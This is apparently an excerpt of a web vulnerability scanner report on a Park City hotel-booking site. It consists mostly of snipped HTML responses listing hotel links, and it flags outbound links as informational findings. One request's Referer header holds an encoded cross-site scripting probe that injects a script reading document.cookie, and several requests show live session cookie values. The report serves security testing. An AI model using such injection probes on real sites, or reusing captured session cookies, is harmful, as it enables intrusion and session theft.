php?group_id=982&cloneID=41&catID=103&eventID=1436&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1436]); ><img src="http://s3.amazonaws.com/book_direct_images/l_3ab163ded569043a5ba8d6b7c415bc3e.jpg" title="Marriott MountainSide Resort"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1421&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1421]); ><img src="http://s3.amazonaws.com/book_direct_images/l_6c33a1f00bbb9436e6bd728a9655e7ae.jpg" title="Hotel Park City"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1460&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1460]); ><img src="http://s3.amazonaws.com/book_direct_images/l_9f54a69c4c22c52ec9a12cf3a2c66c46.jpg" title="PowderWood Resort"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1386&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1386]); ><img src="http://s3.amazonaws.com/book_direct_images/l_88eb84a3441f85a2f3a5d33a2f622cad.jpg" title="Best Western Holiday Hills"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=2578&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',2578]); ><img src="http://s3.amazonaws.com/book_direct_images/l_f537c9210f90ac854d7ea860c4ba19e6.jpg" title="Holiday Inn Express Park City"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1410&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1410]); ><img src="http://s3.amazonaws.com/book_direct_images/l_e009e83ce65266a1765959dc113c7918.jpg" title="Prospector Accommodations"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1453&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1453]); ><img src="http://s3.amazonaws.com/book_direct_images/l_2a733136b1c01bbb4f6f69765b281ea2.jpg" title="Goldener Hirsch Inn"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1456&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1456]); ><img src="http://s3.amazonaws.com/book_direct_images/l_8cac98caac9e39e1546d762321dffb03.jpg" title="Hampton Inn & Suites Park City"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1425&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1425]); ><img src="http://s3.amazonaws.com/book_direct_images/l_01aa0fffb7c2fa5826a2a44d66f28b63.jpg" title="Park City Peaks Hotel"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1422&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1422]); ><img src="http://s3.amazonaws.com/book_direct_images/l_cebc8d2c721ba5f01a90ee609ee781af.jpg" title="The Lodge at the Mountain Village"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1430&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1430]); ><img src="http://s3.amazonaws.com/book_direct_images/l_a4d89b68f8b48f521b0e56530a06e1a3.jpg" title="Yarrow Resort Hotel and Conference"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1418&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1418]); ><img src="http://s3.amazonaws.com/book_direct_images/l_71fb7d44c1976326e05d1dc0dbfdb6d6.jpg" title="The Canyons Grand Summit Resort Hotel and Conference Center"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1577&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1577]); ><img src="http://s3.amazonaws.com/book_direct_images/l_43a53ade52c12c2903c3e190b40abf5c.jpg" title="The Canyons Central Reservations"></a>
...[SNIP]...
p?group_id=982&cloneID=41&catID=103&eventID=37580&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',37580]); ><img src="http://s3.amazonaws.com/book_direct_images/l_5d4fd2686113fcef79928ad9d5433747.jpg" title="The Canyons Escala Lodges"></a>
...[SNIP]...
<div class="span" style="overflow:hidden;"><img id='amenity_image_4' src='http://s3.amazonaws.com/book_direct_images/amenities/57eb7130536632921d0c11351a0a7388.gif' title='Parking Not Available' alt='Parking Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_1' src='http://s3.amazonaws.com/book_direct_images/amenities/fa1eb743274c7b7277a04b5073887890.gif' title='Shuttle Service Not Available' alt='Shuttle Service Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_31' src='http://s3.amazonaws.com/book_direct_images/amenities/a3ebd2775b1683f02ca5a8d1a8ffeaeb.gif' title='Pets Allowed Not Available' alt='Pets Allowed Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_6' src='http://s3.amazonaws.com/book_direct_images/amenities/e163a21a09f8d8ae26e02bfef7d05023.gif' title='Swimming Pool Not Available' alt='Swimming Pool Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_2' src='http://s3.amazonaws.com/book_direct_images/amenities/540aed1002590a31ae1c73fb8187f68f.gif' title='Fitness Room Not Available' alt='Fitness Room Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_7' src='http://s3.amazonaws.com/book_direct_images/amenities/aa2902cb8eb88e55bbcee78942ebb1d9.gif' title='Restaurants Not Available' alt='Restaurants Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_3' src='http://s3.amazonaws.com/book_direct_images/amenities/1560122293a8d9ce4d090a1f6f5f32b2.gif' title='High Speed Internet Not Available' alt='High Speed Internet Not Available' style='height:22px;width:22px;'></div>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1438&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1438]); ><img src="http://s3.amazonaws.com/book_direct_images/l_4be5b8142164d2f1728b2df3a2044d8e.jpg" title="Park Station Condominium Hotel"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1403&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1403]); ><img src="http://s3.amazonaws.com/book_direct_images/l_1fdefade33bd603756afd9f43f61898d.jpg" title="Identity Properties"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1437&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1437]); ><img src="http://s3.amazonaws.com/book_direct_images/l_be0999e9760d8fb45524f27fab9151e9.jpg" title="Marriott Summit Watch at Park City"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1423&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1423]); ><img src="http://s3.amazonaws.com/book_direct_images/l_0926290e36497f874e75b8fc0d6f42e2.jpg" title="The Miner's Club"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1443&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1443]); ><img src="http://s3.amazonaws.com/book_direct_images/l_4737531affac3ba0cc95a9a060e1629d.jpg" title="The Treasure Mountain Inn"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1416&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1416]); ><img src="http://s3.amazonaws.com/book_direct_images/l_0bc03da7d4c0f4726e437c0c05f82dfe.jpg" title="Utah Vacation Homes"></a>
...[SNIP]...
php?group_id=982&cloneID=41&catID=103&eventID=1424&linkTypeID=2&clickSourceID=4" target='_blank' _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Image Link',1424]); ><img src="http://s3.amazonaws.com/book_direct_images/l_48ac0a67bd4711885228fc52a881ef28.jpg" title="Park City Marriott"></a>
...[SNIP]...
<div class="span" style="overflow:hidden;"><img id='amenity_image_4' src='http://s3.amazonaws.com/book_direct_images/amenities/b01e3128d7a405dbb5031afbb683e066.png' title='Parking' alt='Parking' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_1' src='http://s3.amazonaws.com/book_direct_images/amenities/fa1eb743274c7b7277a04b5073887890.gif' title='Shuttle Service Not Available' alt='Shuttle Service Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_31' src='http://s3.amazonaws.com/book_direct_images/amenities/a3ebd2775b1683f02ca5a8d1a8ffeaeb.gif' title='Pets Allowed Not Available' alt='Pets Allowed Not Available' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_6' src='http://s3.amazonaws.com/book_direct_images/amenities/b4abfce876e6328d40e7d6da6f13568f.png' title='Swimming Pool' alt='Swimming Pool' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_2' src='http://s3.amazonaws.com/book_direct_images/amenities/1b8a5baafcd13d3e63fc65de26a409b3.png' title='Fitness Room' alt='Fitness Room' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_7' src='http://s3.amazonaws.com/book_direct_images/amenities/926974964bd0f788099ef7af7d523b3a.png' title='Restaurants' alt='Restaurants' style='height:22px;width:22px;'></div><div class="span" style="overflow:hidden;"><img id='amenity_image_3' src='http://s3.amazonaws.com/book_direct_images/amenities/d0ee49fa9cbb74e995fe3b7f073ee20f.png' title='High Speed Internet' alt='High Speed Internet' style='height:22px;width:22px;'></div>
...[SNIP]...
</div>
               <a style="display:inline-block;font-size:10px;font-weight:normal;" onclick=" _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Directory Link']); " href="http://www.parkcityinfo.com/visitors/lodging-hotels/">Return to Hotels &amp; Resorts Directory</a>
...[SNIP]...
<div class="left">
           <img src="http://s3.amazonaws.com/book_direct_images/l_6c33a1f00bbb9436e6bd728a9655e7ae.jpg" />
        </div>
...[SNIP]...
<div class="mid">
               <a href="http://tools.jackrabbitsystems.com/redirect?package_id=176193&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','Title Link',176193]); " target="_blank">
               <h3>
...[SNIP]...
</a> | <a href="http://tools.jackrabbitsystems.com/redirect?package_id=176193&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','More Info Link',1421]); " target="_blank">Visit Website &gt;</a>
...[SNIP]...
</div>
        <a target="_blank" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','BookDirect Link',1421]); " href="http://tools.jackrabbitsystems.com/redirect?package_id=176193&clone_id=41&start=2011-02-14&end=2011-02-15" class="book-direct">&nbsp;</a>
...[SNIP]...
<div class="left">
           <img src="http://s3.amazonaws.com/book_direct_images/l_8cac98caac9e39e1546d762321dffb03.jpg" />
        </div>
...[SNIP]...
<div class="mid">
               <a href="http://tools.jackrabbitsystems.com/redirect?package_id=43865&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','Title Link',43865]); " target="_blank">
               <h3>
...[SNIP]...
</a> | <a href="http://tools.jackrabbitsystems.com/redirect?package_id=43865&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','More Info Link',1456]); " target="_blank">Visit Website &gt;</a>
...[SNIP]...
</div>
        <a target="_blank" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','BookDirect Link',1456]); " href="http://tools.jackrabbitsystems.com/redirect?package_id=43865&clone_id=41&start=2011-02-14&end=2011-02-15" class="book-direct">&nbsp;</a>
...[SNIP]...
<div class="left">
           <img src="http://s3.amazonaws.com/book_direct_images/l_327869c94f88d9daed4a8f0022a00fe7.jpg" />
        </div>
...[SNIP]...
<div class="mid">
               <a href="http://tools.jackrabbitsystems.com/redirect?package_id=175973&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','Title Link',175973]); " target="_blank">
               <h3>
...[SNIP]...
</a> | <a href="http://tools.jackrabbitsystems.com/redirect?package_id=175973&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','More Info Link',1450]); " target="_blank">Visit Website &gt;</a>
...[SNIP]...
</div>
        <a target="_blank" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','BookDirect Link',1450]); " href="http://tools.jackrabbitsystems.com/redirect?package_id=175973&clone_id=41&start=2011-02-14&end=2011-02-15" class="book-direct">&nbsp;</a>
...[SNIP]...
<div class="left">
           <img src="http://s3.amazonaws.com/book_direct_images/l_6c33a1f00bbb9436e6bd728a9655e7ae.jpg" />
        </div>
...[SNIP]...
<div class="mid">
               <a href="http://tools.jackrabbitsystems.com/redirect?package_id=176192&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','Title Link',176192]); " target="_blank">
               <h3>
...[SNIP]...
</a> | <a href="http://tools.jackrabbitsystems.com/redirect?package_id=176192&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','More Info Link',1421]); " target="_blank">Visit Website &gt;</a>
...[SNIP]...
</div>
        <a target="_blank" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','BookDirect Link',1421]); " href="http://tools.jackrabbitsystems.com/redirect?package_id=176192&clone_id=41&start=2011-02-14&end=2011-02-15" class="book-direct">&nbsp;</a>
...[SNIP]...
<div class="left">
           <img src="http://s3.amazonaws.com/book_direct_images/l_71fb7d44c1976326e05d1dc0dbfdb6d6.jpg" />
        </div>
...[SNIP]...
<div class="mid">
               <a href="http://tools.jackrabbitsystems.com/redirect?package_id=175981&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','Title Link',175981]); " target="_blank">
               <h3>
...[SNIP]...
</a> | <a href="http://tools.jackrabbitsystems.com/redirect?package_id=175981&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','More Info Link',1418]); " target="_blank">Visit Website &gt;</a>
...[SNIP]...
</div>
        <a target="_blank" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','BookDirect Link',1418]); " href="http://tools.jackrabbitsystems.com/redirect?package_id=175981&clone_id=41&start=2011-02-14&end=2011-02-15" class="book-direct">&nbsp;</a>
...[SNIP]...
<div class="left">
           <img src="http://s3.amazonaws.com/book_direct_images/l_327869c94f88d9daed4a8f0022a00fe7.jpg" />
        </div>
...[SNIP]...
<div class="mid">
               <a href="http://tools.jackrabbitsystems.com/redirect?package_id=175975&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','Title Link',175975]); " target="_blank">
               <h3>
...[SNIP]...
</a> | <a href="http://tools.jackrabbitsystems.com/redirect?package_id=175975&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','More Info Link',1450]); " target="_blank">Visit Website &gt;</a>
...[SNIP]...
</div>
        <a target="_blank" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','BookDirect Link',1450]); " href="http://tools.jackrabbitsystems.com/redirect?package_id=175975&clone_id=41&start=2011-02-14&end=2011-02-15" class="book-direct">&nbsp;</a>
...[SNIP]...
<div class="left">
           <img src="http://s3.amazonaws.com/book_direct_images/l_6c33a1f00bbb9436e6bd728a9655e7ae.jpg" />
        </div>
...[SNIP]...
<div class="mid">
               <a href="http://tools.jackrabbitsystems.com/redirect?package_id=176196&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','Title Link',176196]); " target="_blank">
               <h3>
...[SNIP]...
</a> | <a href="http://tools.jackrabbitsystems.com/redirect?package_id=176196&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','More Info Link',1421]); " target="_blank">Visit Website &gt;</a>
...[SNIP]...
</div>
        <a target="_blank" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','BookDirect Link',1421]); " href="http://tools.jackrabbitsystems.com/redirect?package_id=176196&clone_id=41&start=2011-02-14&end=2011-02-15" class="book-direct">&nbsp;</a>
...[SNIP]...
<div class="left">
           <img src="http://s3.amazonaws.com/book_direct_images/l_6c33a1f00bbb9436e6bd728a9655e7ae.jpg" />
        </div>
...[SNIP]...
<div class="mid">
               <a href="http://tools.jackrabbitsystems.com/redirect?package_id=176229&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','Title Link',176229]); " target="_blank">
               <h3>
...[SNIP]...
</a> | <a href="http://tools.jackrabbitsystems.com/redirect?package_id=176229&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','More Info Link',1421]); " target="_blank">Visit Website &gt;</a>
...[SNIP]...
</div>
        <a target="_blank" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','BookDirect Link',1421]); " href="http://tools.jackrabbitsystems.com/redirect?package_id=176229&clone_id=41&start=2011-02-14&end=2011-02-15" class="book-direct">&nbsp;</a>
...[SNIP]...
<div class="left">
           <img src="http://s3.amazonaws.com/book_direct_images/l_6c33a1f00bbb9436e6bd728a9655e7ae.jpg" />
        </div>
...[SNIP]...
<div class="mid">
               <a href="http://tools.jackrabbitsystems.com/redirect?package_id=176197&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','Title Link',176197]); " target="_blank">
               <h3>
...[SNIP]...
</a> | <a href="http://tools.jackrabbitsystems.com/redirect?package_id=176197&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','More Info Link',1421]); " target="_blank">Visit Website &gt;</a>
...[SNIP]...
</div>
        <a target="_blank" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','BookDirect Link',1421]); " href="http://tools.jackrabbitsystems.com/redirect?package_id=176197&clone_id=41&start=2011-02-14&end=2011-02-15" class="book-direct">&nbsp;</a>
...[SNIP]...
<div class="left">
           <img src="http://s3.amazonaws.com/book_direct_images/l_71fb7d44c1976326e05d1dc0dbfdb6d6.jpg" />
        </div>
...[SNIP]...
<div class="mid">
               <a href="http://tools.jackrabbitsystems.com/redirect?package_id=175627&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','Title Link',175627]); " target="_blank">
               <h3>
...[SNIP]...
</a> | <a href="http://tools.jackrabbitsystems.com/redirect?package_id=175627&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','More Info Link',1418]); " target="_blank">Visit Website &gt;</a>
...[SNIP]...
</div>
        <a target="_blank" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','BookDirect Link',1418]); " href="http://tools.jackrabbitsystems.com/redirect?package_id=175627&clone_id=41&start=2011-02-14&end=2011-02-15" class="book-direct">&nbsp;</a>
...[SNIP]...
<div class="left">
           <img src="http://s3.amazonaws.com/book_direct_images/l_71fb7d44c1976326e05d1dc0dbfdb6d6.jpg" />
        </div>
...[SNIP]...
<div class="mid">
               <a href="http://tools.jackrabbitsystems.com/redirect?package_id=175982&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','Title Link',175982]); " target="_blank">
               <h3>
...[SNIP]...
</a> | <a href="http://tools.jackrabbitsystems.com/redirect?package_id=175982&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','More Info Link',1418]); " target="_blank">Visit Website &gt;</a>
...[SNIP]...
</div>
        <a target="_blank" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','BookDirect Link',1418]); " href="http://tools.jackrabbitsystems.com/redirect?package_id=175982&clone_id=41&start=2011-02-14&end=2011-02-15" class="book-direct">&nbsp;</a>
...[SNIP]...
<div class="left">
           <img src="http://s3.amazonaws.com/book_direct_images/l_6c33a1f00bbb9436e6bd728a9655e7ae.jpg" />
        </div>
...[SNIP]...
<div class="mid">
               <a href="http://tools.jackrabbitsystems.com/redirect?package_id=176194&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','Title Link',176194]); " target="_blank">
               <h3>
...[SNIP]...
</a> | <a href="http://tools.jackrabbitsystems.com/redirect?package_id=176194&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','More Info Link',1421]); " target="_blank">Visit Website &gt;</a>
...[SNIP]...
</div>
        <a target="_blank" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','BookDirect Link',1421]); " href="http://tools.jackrabbitsystems.com/redirect?package_id=176194&clone_id=41&start=2011-02-14&end=2011-02-15" class="book-direct">&nbsp;</a>
...[SNIP]...
<div class="left">
           <img src="http://s3.amazonaws.com/book_direct_images/l_8cac98caac9e39e1546d762321dffb03.jpg" />
        </div>
...[SNIP]...
<div class="mid">
               <a href="http://tools.jackrabbitsystems.com/redirect?package_id=43867&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','Title Link',43867]); " target="_blank">
               <h3>
...[SNIP]...
</a> | <a href="http://tools.jackrabbitsystems.com/redirect?package_id=43867&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','More Info Link',1456]); " target="_blank">Visit Website &gt;</a>
...[SNIP]...
</div>
        <a target="_blank" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','BookDirect Link',1456]); " href="http://tools.jackrabbitsystems.com/redirect?package_id=43867&clone_id=41&start=2011-02-14&end=2011-02-15" class="book-direct">&nbsp;</a>
...[SNIP]...
<div class="left">
           <img src="http://s3.amazonaws.com/book_direct_images/l_327869c94f88d9daed4a8f0022a00fe7.jpg" />
        </div>
...[SNIP]...
<div class="mid">
               <a href="http://tools.jackrabbitsystems.com/redirect?package_id=175974&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','Title Link',175974]); " target="_blank">
               <h3>
...[SNIP]...
</a> | <a href="http://tools.jackrabbitsystems.com/redirect?package_id=175974&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','More Info Link',1450]); " target="_blank">Visit Website &gt;</a>
...[SNIP]...
</div>
        <a target="_blank" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','BookDirect Link',1450]); " href="http://tools.jackrabbitsystems.com/redirect?package_id=175974&clone_id=41&start=2011-02-14&end=2011-02-15" class="book-direct">&nbsp;</a>
...[SNIP]...
<div class="left">
           <img src="http://s3.amazonaws.com/book_direct_images/l_6c33a1f00bbb9436e6bd728a9655e7ae.jpg" />
        </div>
...[SNIP]...
<div class="mid">
               <a href="http://tools.jackrabbitsystems.com/redirect?package_id=176198&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','Title Link',176198]); " target="_blank">
               <h3>
...[SNIP]...
</a> | <a href="http://tools.jackrabbitsystems.com/redirect?package_id=176198&clone_id=41&start=2011-02-14&end=2011-02-15" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','More Info Link',1421]); " target="_blank">Visit Website &gt;</a>
...[SNIP]...
</div>
        <a target="_blank" onclick=" _gaq.push(['jrs_analytics._trackEvent','Deals Page','Click','BookDirect Link',1421]); " href="http://tools.jackrabbitsystems.com/redirect?package_id=176198&clone_id=41&start=2011-02-14&end=2011-02-15" class="book-direct">&nbsp;</a>
...[SNIP]...
</div>
               <a style="display:inline-block;font-size:10px;font-weight:normal;" onclick=" _gaq.push(['jrs_analytics._trackEvent','Date-Driven Search Results Page','Click','Directory Link']); " href="http://www.parkcityinfo.com/visitors/lodging-hotels/">Return to Hotels &amp; Resorts Directory</a>
...[SNIP]...
</div>
<iframe src="http://www.parkcityinfo.com/footer_jackrabbit.cfm" width="100%" height="75" frameborder="0" allowtransparency="true" scrolling="no"></iframe>
...[SNIP]...
<div id="page_footer" style="padding-bottom:25px; color:#444; font-size:11px;"><a href="http://www.jackrabbitsystems.com/" target="_blank" style="color:#444; font-size:11px;"><img src="http://www.jackrabbitsystems.com/images/trip_images/powered_by_jackrabbit.png" name="powered_by_img" id="powered_by_img" style="border:none;"></a>
...[SNIP]...

5.9. http://parkcitytrips.com/redirect_booking.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://parkcitytrips.com
Path:   /redirect_booking.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /redirect_booking.php?cloneID=41&group_id=982&rooms=1&nights=1&sDay=26&sMonth=10&sYear=2010&start-date=02%2F10%2F2011&end-date=02%2F13%2F2011&lodgingID=103&Submit.x=58&Submit.y=29 HTTP/1.1
Host: parkcitytrips.com
Proxy-Connection: keep-alive
Referer: http://www.parkcityinfo.com/visitors/lodging-hotels/?gclid=CNLClayJ_KYCFUGo4AodpWQ8Gg&89fd0%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E130ae64f81c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SERVERID=i-f3d4a39a

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 22:09:23 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 2967


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<center>
<iframe src="http://www.parkcityinfo.com/header_jackrabbit.cfm" width="100%" height="115" frameborder="0" allowtransparency="true" scrolling="no"></iframe>
...[SNIP]...
<p><img src="http://www.jackrabbitsystems.com/images/trip_images/activityanimation.gif"></p>
...[SNIP]...
</table>
<iframe src="http://www.parkcityinfo.com/footer_jackrabbit.cfm" width="100%" height="75" frameborder="0" allowtransparency="true" scrolling="no"></iframe>
...[SNIP]...

5.10. http://parkcitytrips.com/v002/dbase/php_ajax/specials.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://parkcitytrips.com
Path:   /v002/dbase/php_ajax/specials.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /v002/dbase/php_ajax/specials.php?cloneID=41&eventID=1421&group_id=1293&sDate=2011-02-14&eDate=2011-02-15&deals=1 HTTP/1.1
Host: parkcitytrips.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SERVERID=i-f3d4a39a; __utmv=252597768.|2=Results%20Page=parkcitytrips.com=1,; __utmz=252597768.1297289442.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=rso1kpo756scrthfhm9htcvdf3; __utma=252597768.924705233.1297289442.1297289442.1297289442.1; __utmc=252597768; __utmb=252597768.4.10.1297289442;

Response

HTTP/1.0 200 OK
Date: Wed, 09 Feb 2011 22:45:09 GMT
Server: Apache/2.2.3 (CentOS)
